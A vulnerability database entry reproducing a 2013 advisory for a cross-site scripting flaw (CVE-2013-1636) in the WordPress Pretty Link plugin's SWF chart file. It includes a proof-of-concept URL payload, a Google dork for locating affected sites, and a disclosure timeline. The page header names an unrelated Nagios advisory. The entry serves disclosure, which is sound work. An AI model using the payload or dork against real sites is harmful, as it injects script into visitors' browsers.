Lucene search
SecurityvulnsSECURITYVULNS:DOC:29096HistoryFeb 24, 2013 - 12:00 a.m.
OSEC-2013-01: nagios metacharacter filtering omission
2013-02-2400:00:00
vulners.com
26
Exploit Title: Wordpress pretty-link plugin XSS in SWF
Release Date: 20/02/13
Author: hip [Insight-Labs]
Contact: [email protected] | Website: http://insight-labs.org
Software Link: http://downloads.wordpress.org/plugin/pretty-link.1.6.3.zip
Vendor Homepage: http://prettylinkpro.com/
Tested on: XPsp3
Affected version: 1.6.3 before
Google Dork: inurl:/wp-content/plugins/pretty-link/
REF:CVE-2013-1636
Introduction:
Pretty-link is Shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name!
XSS - Proof Of Concept:
vulnerable path:
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf
vulnerabile parameter:get-data
POC:
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()
Patch:
– Vendor was notified on the 23/01/2013
– Vendor released version 1.6.3 on 25/01/2013 Fixed the bug
– REF:http://wordpress.org/extend/plugins/pretty-link/changelog/
Related
prion
prion
Cross site scripting
2014-03-12 14:55:00
Design/Logic Flaw
2013-07-02 20:55:00
debiancve
debiancve
CVE-2013-1636
2014-03-12 14:55:00
packetstorm
packetstorm
WordPress Pretty Link 1.6.3 Cross Site Scripting
2013-02-21 00:00:00
dotDefender Firewall 5.00.12865 / 5.13-13282 Cross Site Scripting
2016-02-09 00:00:00
securityvulns
securityvulns
[CVE-2013-1636]Wordpress pretty-link plugin XSS in SWF‏
2013-02-24 00:00:00
cve
cve
CVE-2013-1636
2014-03-12 14:55:00
CVE-2013-3726
2013-07-02 20:55:00
wpvulndb
wpvulndb
Pretty Link Lite <= 1.6.2 - XSS in SWF
2014-08-01 10:58:42
Related for SECURITYVULNS:DOC:29096